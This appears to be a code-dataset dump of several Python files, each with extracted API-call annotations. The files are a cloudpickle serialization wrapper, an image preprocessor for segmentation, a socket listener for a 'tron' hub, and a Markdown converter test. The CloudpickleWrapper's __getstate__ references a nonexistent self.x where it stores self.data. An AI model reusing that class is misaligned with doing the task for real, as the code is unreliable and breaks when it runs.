as pd\n'), ((1886, 1920), 'irf.estimate_exposure_time', 'estimate_exposure_time', (['timestamps'], {}), '(timestamps)\n', (1908, 1920), False, 'from irf import estimate_exposure_time, build_exposure_map\n'), ((2124, 2166), 'astropy.coordinates.SkyCoord', 'SkyCoord', ([], {'ra': 'ra_pointing', 'dec': 'dec_pointing'}), '(ra=ra_pointing, dec=dec_pointing)\n', (2132, 2166), False, 'from astropy.coordinates import SkyCoord\n'), ((2414, 2476), 'irf.build_exposure_map', 'build_exposure_map', (['pointing', 'timestamps'], {'shape': '(n_pix, n_pix)'}), '(pointing, timestamps, shape=(n_pix, n_pix))\n', (2432, 2476), False, 'from irf import estimate_exposure_time, build_exposure_map\n'), ((2863, 2896), 'matplotlib.pyplot.savefig', 'plt.savefig', (['output_path'], {'dpi': '(200)'}), '(output_path, dpi=200)\n', (2874, 2896), True, 'import matplotlib.pyplot as plt\n'), ((2945, 2973), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (2955, 2973), True, 'import matplotlib.pyplot as plt\n'), ((2983, 3010), 'matplotlib.pyplot.subplot', 'plt.subplot', ([], {'projection': 'wcs'}), '(projection=wcs)\n', (2994, 3010), True, 'import matplotlib.pyplot as plt\n'), ((3300, 3315), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['d'], {}), '(d)\n', (3312, 3315), True, 'import matplotlib.pyplot as plt\n'), ((1829, 1859), 'pandas.to_datetime', 'pd.to_datetime', (['data.timestamp'], {}), '(data.timestamp)\n', (1843, 1859), True, 'import pandas as pd\n'), ((2560, 2593), 'astropy.coordinates.SkyCoord.from_name', 'SkyCoord.from_name', (['"""Crab Nebula"""'], {}), "('Crab Nebula')\n", (2578, 2593), False, 'from astropy.coordinates import SkyCoord\n'), ((905, 947), 'click.Path', 'click.Path', ([], {'file_okay': '(True)', 'dir_okay': '(False)'}), '(file_okay=True, dir_okay=False)\n', (915, 947), False, 'import click\n'), ((996, 1052), 'click.Path', 'click.Path', ([], {'file_okay': '(True)', 'dir_okay': '(False)', 'exists': '(False)'}), '(file_okay=True, 
dir_okay=False, exists=False)\n', (1006, 1052), False, 'import click\n'), ((638, 735), 'astroquery.skyview.SkyView.get_images', 'SkyView.get_images', ([], {'position': 'img_center', 'pixels': 'n_pix', 'survey': "['DSS']", 'width': 'fov', 'height': 'fov'}), "(position=img_center, pixels=n_pix, survey=['DSS'], width\n =fov, height=fov)\n", (656, 735), False, 'from astroquery.skyview import SkyView\n'), ((3109, 3138), 'astropy.visualization.ZScaleInterval', 'ZScaleInterval', ([], {'contrast': '(0.05)'}), '(contrast=0.05)\n', (3123, 3138), False, 'from astropy.visualization import ImageNormalize, ZScaleInterval, AsinhStretch\n'), ((3160, 3179), 'astropy.visualization.AsinhStretch', 'AsinhStretch', ([], {'a': '(0.2)'}), '(a=0.2)\n', (3172, 3179), False, 'from astropy.visualization import ImageNormalize, ZScaleInterval, AsinhStretch\n')] |
""" Class to serialize data for multiprocessing.
Inspired by: https://github.com/openai/baselines/blob/master/baselines/common/vec_env/__init__.py
"""
import cloudpickle
import pickle
class CloudpickleWrapper(object):
""" Uses `cloudpickle` to serialize contents. """
def __init__(self, data):
self.data = data
def __getstate__(self):
return cloudpickle.dumps(self.x)
def __setstate__(self, data):
self.data = pickle.loads(data)
| [
"cloudpickle.dumps",
"pickle.loads"
] | [((375, 400), 'cloudpickle.dumps', 'cloudpickle.dumps', (['self.x'], {}), '(self.x)\n', (392, 400), False, 'import cloudpickle\n'), ((456, 474), 'pickle.loads', 'pickle.loads', (['data'], {}), '(data)\n', (468, 474), False, 'import pickle\n')] |
import numpy as np
import cv2
from semantic_segmentation.data_structure.image_handler import ImageHandler
class Preprocessor:
def __init__(self, image_size):
self.image_size = image_size
self.min_height = 16
self.min_width = 16
self.max_height = 900
self.max_width = 900
self.obox = None
def resize(self, image):
img_h = ImageHandler(image)
if None in self.image_size:
return self.rescale(image, self.max_width, self.max_height, is_lbm=False)
return img_h.resize(height=self.image_size[0], width=self.image_size[1])
def normalize(self, image):
epsilon = 1e-6
mean_mat = np.mean(image)
var_mat = np.var(image)
if var_mat != 0:
mat_norm = (image - mean_mat) / var_mat
min_mat = np.min(mat_norm)
max_mat = np.max(mat_norm)
mat_norm = (mat_norm - min_mat) / (max_mat - min_mat + epsilon)
else:
mat_norm = np.zeros(image.shape)
return mat_norm
def rescale(self, data, max_width, max_height, is_lbm=False):
height, width = data.shape[0], data.shape[1]
if height >= max_height:
new_height = max_height
new_width = int(width * new_height / height)
if is_lbm:
data = cv2.resize(data, (int(new_width), int(new_height)), interpolation=cv2.INTER_NEAREST)
else:
data = cv2.resize(data, (int(new_width), int(new_height)), interpolation=cv2.INTER_CUBIC)
height, width = data.shape[0], data.shape[1]
if width >= max_width:
new_width = max_width
new_height = int(height * new_width / width)
if is_lbm:
data = cv2.resize(data, (int(new_width), int(new_height)), interpolation=cv2.INTER_NEAREST)
else:
data = cv2.resize(data, (int(new_width), int(new_height)), interpolation=cv2.INTER_CUBIC)
height, width = data.shape[0], data.shape[1]
return np.reshape(data, (height, width, -1))
def pad(self, image):
img_h = ImageHandler(image)
height, width, ch = image.shape
if height > width:
if height >= self.image_size[0]:
new_height = self.image_size[0]
new_width = int(width * new_height / height)
image = img_h.resize(height=new_height, width=new_width)
else:
if width >= self.image_size[1]:
new_width = self.image_size[1]
new_height = int(height * new_width / width)
image = img_h.resize(height=new_height, width=new_width)
ih, iw = image.shape[:2]
ph, pw = self.image_size[0], self.image_size[1]
x = np.mean(image) * np.ones((ph, pw, ch))
sy1 = int(ph/2)-int(ih/2)
sx1 = int(pw/2)-int(iw/2)
if ch == 1:
image = np.expand_dims(image, axis=2)
x[sy1:sy1+ih, sx1:sx1+iw, :] = image
self.obox = [sx1, sy1, sx1 + iw, sy1 + ih]
return x
def apply(self, image):
image = self.resize(image)
img_h = ImageHandler(image)
if self.image_size[2] == 1:
image = img_h.gray()
image = np.expand_dims(image, axis=2)
image = self.normalize(image)
return image
def lbm_resize(self, lbm, width, height):
if None in [width, height]:
return self.rescale(lbm, self.max_width, self.max_height, is_lbm=True)
return cv2.resize(lbm,
(int(width), int(height)),
interpolation=cv2.INTER_NEAREST)
def apply_to_label_map(self, label_map):
label_map = self.lbm_resize(label_map, width=self.image_size[1], height=self.image_size[0])
if len(label_map.shape) < 3:
label_map = np.expand_dims(label_map, axis=2)
return label_map
| [
"numpy.mean",
"numpy.reshape",
"numpy.ones",
"semantic_segmentation.data_structure.image_handler.ImageHandler",
"numpy.max",
"numpy.zeros",
"numpy.expand_dims",
"numpy.min",
"numpy.var"
] | [((389, 408), 'semantic_segmentation.data_structure.image_handler.ImageHandler', 'ImageHandler', (['image'], {}), '(image)\n', (401, 408), False, 'from semantic_segmentation.data_structure.image_handler import ImageHandler\n'), ((687, 701), 'numpy.mean', 'np.mean', (['image'], {}), '(image)\n', (694, 701), True, 'import numpy as np\n'), ((720, 733), 'numpy.var', 'np.var', (['image'], {}), '(image)\n', (726, 733), True, 'import numpy as np\n'), ((2047, 2084), 'numpy.reshape', 'np.reshape', (['data', '(height, width, -1)'], {}), '(data, (height, width, -1))\n', (2057, 2084), True, 'import numpy as np\n'), ((2128, 2147), 'semantic_segmentation.data_structure.image_handler.ImageHandler', 'ImageHandler', (['image'], {}), '(image)\n', (2140, 2147), False, 'from semantic_segmentation.data_structure.image_handler import ImageHandler\n'), ((3152, 3171), 'semantic_segmentation.data_structure.image_handler.ImageHandler', 'ImageHandler', (['image'], {}), '(image)\n', (3164, 3171), False, 'from semantic_segmentation.data_structure.image_handler import ImageHandler\n'), ((833, 849), 'numpy.min', 'np.min', (['mat_norm'], {}), '(mat_norm)\n', (839, 849), True, 'import numpy as np\n'), ((872, 888), 'numpy.max', 'np.max', (['mat_norm'], {}), '(mat_norm)\n', (878, 888), True, 'import numpy as np\n'), ((1002, 1023), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (1010, 1023), True, 'import numpy as np\n'), ((2782, 2796), 'numpy.mean', 'np.mean', (['image'], {}), '(image)\n', (2789, 2796), True, 'import numpy as np\n'), ((2799, 2820), 'numpy.ones', 'np.ones', (['(ph, pw, ch)'], {}), '((ph, pw, ch))\n', (2806, 2820), True, 'import numpy as np\n'), ((2929, 2958), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(2)'}), '(image, axis=2)\n', (2943, 2958), True, 'import numpy as np\n'), ((3261, 3290), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(2)'}), '(image, axis=2)\n', (3275, 3290), True, 'import numpy as np\n'), ((3866, 3899), 
'numpy.expand_dims', 'np.expand_dims', (['label_map'], {'axis': '(2)'}), '(label_map, axis=2)\n', (3880, 3899), True, 'import numpy as np\n')] |
import socket
import time
from tron import g, hub
from tron.Hub.Command.Decoders.ASCIICmdDecoder import ASCIICmdDecoder
from tron.Hub.Nub.Commanders import AuthStdinNub
from tron.Hub.Nub.Listeners import SocketListener
from tron.Hub.Reply.Encoders.ASCIIReplyEncoder import ASCIIReplyEncoder
name = 'TUI'
listenPort = 9877
def acceptTUI(in_f, out_f, addr=None):
""" Create a command source with the given fds as input and output. """
# Fetch a unique ID
#
nubID = g.nubIDs.gimme()
fullname = '%s_%d' % (name, nubID)
# all = ('tcc','mcp',
# 'hub','msg')
all = ('*', )
otherIP, otherPort = in_f.getpeername()
try:
otherFQDN = socket.getfqdn(otherIP)
except BaseException:
otherFQDN = 'unknown'
# os.system("/usr/bin/sudo /usr/local/bin/www-access add %s" % (otherIP))
d = ASCIICmdDecoder(needCID=False, EOL='\r\n', debug=1)
e = ASCIIReplyEncoder(EOL='\r', simple=True, debug=1, CIDfirst=True)
c = AuthStdinNub(g.poller,
in_f,
out_f,
name=fullname,
encoder=e,
decoder=d,
debug=1,
type='TUI',
needsAuth=True,
isUser=True,
otherIP=otherIP,
otherFQDN=otherFQDN)
c.taster.addToFilter(all, (), all)
hub.addCommander(c)
def start(poller):
stop()
lt = SocketListener(poller, listenPort, name, acceptTUI)
hub.addAcceptor(lt)
def stop():
a = hub.findAcceptor(name)
if a:
hub.dropAcceptor(a)
del a
time.sleep(0.5) # OK, why did I put this in here?
| [
"tron.hub.findAcceptor",
"tron.Hub.Command.Decoders.ASCIICmdDecoder.ASCIICmdDecoder",
"tron.g.nubIDs.gimme",
"socket.getfqdn",
"tron.Hub.Nub.Commanders.AuthStdinNub",
"tron.hub.addCommander",
"time.sleep",
"tron.hub.addAcceptor",
"tron.Hub.Reply.Encoders.ASCIIReplyEncoder.ASCIIReplyEncoder",
"tron... | [((485, 501), 'tron.g.nubIDs.gimme', 'g.nubIDs.gimme', ([], {}), '()\n', (499, 501), False, 'from tron import g, hub\n'), ((853, 904), 'tron.Hub.Command.Decoders.ASCIICmdDecoder.ASCIICmdDecoder', 'ASCIICmdDecoder', ([], {'needCID': '(False)', 'EOL': "'\\r\\n'", 'debug': '(1)'}), "(needCID=False, EOL='\\r\\n', debug=1)\n", (868, 904), False, 'from tron.Hub.Command.Decoders.ASCIICmdDecoder import ASCIICmdDecoder\n'), ((913, 977), 'tron.Hub.Reply.Encoders.ASCIIReplyEncoder.ASCIIReplyEncoder', 'ASCIIReplyEncoder', ([], {'EOL': "'\\r'", 'simple': '(True)', 'debug': '(1)', 'CIDfirst': '(True)'}), "(EOL='\\r', simple=True, debug=1, CIDfirst=True)\n", (930, 977), False, 'from tron.Hub.Reply.Encoders.ASCIIReplyEncoder import ASCIIReplyEncoder\n'), ((986, 1154), 'tron.Hub.Nub.Commanders.AuthStdinNub', 'AuthStdinNub', (['g.poller', 'in_f', 'out_f'], {'name': 'fullname', 'encoder': 'e', 'decoder': 'd', 'debug': '(1)', 'type': '"""TUI"""', 'needsAuth': '(True)', 'isUser': '(True)', 'otherIP': 'otherIP', 'otherFQDN': 'otherFQDN'}), "(g.poller, in_f, out_f, name=fullname, encoder=e, decoder=d,\n debug=1, type='TUI', needsAuth=True, isUser=True, otherIP=otherIP,\n otherFQDN=otherFQDN)\n", (998, 1154), False, 'from tron.Hub.Nub.Commanders import AuthStdinNub\n'), ((1421, 1440), 'tron.hub.addCommander', 'hub.addCommander', (['c'], {}), '(c)\n', (1437, 1440), False, 'from tron import g, hub\n'), ((1483, 1534), 'tron.Hub.Nub.Listeners.SocketListener', 'SocketListener', (['poller', 'listenPort', 'name', 'acceptTUI'], {}), '(poller, listenPort, name, acceptTUI)\n', (1497, 1534), False, 'from tron.Hub.Nub.Listeners import SocketListener\n'), ((1539, 1558), 'tron.hub.addAcceptor', 'hub.addAcceptor', (['lt'], {}), '(lt)\n', (1554, 1558), False, 'from tron import g, hub\n'), ((1581, 1603), 'tron.hub.findAcceptor', 'hub.findAcceptor', (['name'], {}), '(name)\n', (1597, 1603), False, 'from tron import g, hub\n'), ((685, 708), 'socket.getfqdn', 'socket.getfqdn', (['otherIP'], {}), 
'(otherIP)\n', (699, 708), False, 'import socket\n'), ((1622, 1641), 'tron.hub.dropAcceptor', 'hub.dropAcceptor', (['a'], {}), '(a)\n', (1638, 1641), False, 'from tron import g, hub\n'), ((1664, 1679), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (1674, 1679), False, 'import time\n')] |
from unittest import TestCase
from pathlib import Path
from src.markdown_converter import MarkdownConverter
class TestMarkdownHeader(TestCase):
def setUp(self):
self.converter = MarkdownConverter("test/dokuwiki_example.txt")
def test_acceptance_test_case(self):
# python 3.5 and up
expected = Path("test/expected_markdown_output.txt").read_text()
actual = self.converter.convert()
print(actual)
self.assertEqual(expected, actual, "Files not matching!")
| [
"src.markdown_converter.MarkdownConverter",
"pathlib.Path"
] | [((194, 240), 'src.markdown_converter.MarkdownConverter', 'MarkdownConverter', (['"""test/dokuwiki_example.txt"""'], {}), "('test/dokuwiki_example.txt')\n", (211, 240), False, 'from src.markdown_converter import MarkdownConverter\n'), ((330, 371), 'pathlib.Path', 'Path', (['"""test/expected_markdown_output.txt"""'], {}), "('test/expected_markdown_output.txt')\n", (334, 371), False, 'from pathlib import Path\n')] |